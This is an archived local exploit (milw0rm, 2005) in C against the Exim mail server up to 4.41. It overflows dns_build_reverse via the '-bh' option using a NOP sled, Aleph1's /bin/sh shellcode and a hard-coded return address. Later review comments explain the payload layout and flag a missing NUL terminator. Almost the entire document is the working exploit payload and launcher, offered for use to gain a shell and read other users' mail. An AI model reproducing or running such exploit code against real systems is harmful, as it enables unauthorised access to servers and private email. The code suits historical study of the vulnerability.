Exim <= 4.41 dns_build_reverse Local Exploit



                                                /* 
 * ripped straight off iDEFENSE advisory - so lazy I just picked
 * up GDB... bored on a weeknight :(
 * 
 * nothing to write home to mother about due to the fact that
 * you need a local user account on a server and all you
 * get is to read other people's emails ....
 * 
 * not even my own shellcode. aleph1 shellcode - cut and paste job 
 * with nops to pad.
 *
 * Regards,
 * Plugger aka Tony Lockett
 *
 * 
 * 
 */

/*
 * Argument string handed to exim as argv[2] by main() below.  Layout, as
 * annotated per line: a 21-byte prefix taken from the iDEFENSE advisory,
 * a 218-byte NOP sled, 45 bytes of Aleph1's classic Linux/x86 shellcode
 * (the embedded "/bin/sh" string is its target program) and a 4-byte
 * address, 288 bytes in total.
 *
 * NOTE(review): the initializer is exactly 288 bytes, so a char[288]
 * stores no terminating NUL (C11 6.7.9p14); execve() therefore keeps
 * reading whatever sits after `bomb` in memory as part of the argument.
 *
 * NOTE(review): the trailing 4 bytes are a hard-coded stack address; it
 * is tied to one particular binary, kernel and environment layout and
 * is not meaningful elsewhere.
 */
char bomb[288]=

/* the gear from iDEFENSE */
&#34;::%A:::::::::::::::::&#34;                             /* 21 bytes  */
                                                    /* --------  */
/* NOPS for padding */
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90&#34;                                          /* 218 bytes */
                                                    /* --------- */
/* actual code courtesy Aleph1 */
&#34;\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89&#34;  /* 12 bytes  */
&#34;\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c&#34;  /* 12 bytes  */
&#34;\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80&#34;              /* 9 bytes   */
&#34;\xe8\xdc\xff\xff\xff/bin/sh&#34;                       /* 12 bytes  */

/* where EIP should point */
&#34;\xf4\xf2\xff\xbf&#34;;                                 /*  4 bytes  */
                                                    /* --------  */
                                                    /* 49 bytes  */
                                                    /* --------  */
                                                    /* 288 bytes */
                                                    /* ========= */
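/*
 * Entry point: builds argv for "exim -bh <bomb>" and replaces this process
 * with exim via execve().
 *
 * execve() only returns on failure; the original ignored that and fell
 * through to a bare `return;` in a function implicitly returning int
 * (pre-C99 implicit int is not valid C11).  Now declared as int main(void)
 * and the failure path is reported.
 *
 * Returns 0 only if execve() somehow returns without error (it should not),
 * 1 if the launch failed.
 */
int main(void)
{
  /* execve() requires a NULL-terminated argv. */
  char *exim[4];
  exim[0] = "/usr/exim/bin/exim";
  exim[1] = "-bh";
  exim[2] = bomb;            /* payload defined above; see its notes */
  exim[3] = 0x0;
  /* stdio buffers are not flushed by execve(); with a line-buffered tty
   * the trailing newline gets this out, with a pipe it may be lost. */
  printf("Firing up exim - cross your fingers for shell!\n");
  /* Empty environment, as in the original listing. */
  if (execve(exim[0], exim, 0x0) == -1) {
    printf("execve of %s failed\n", exim[0]);
    return 1;
  }
  return 0;
}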

// milw0rm.com [2005-05-25]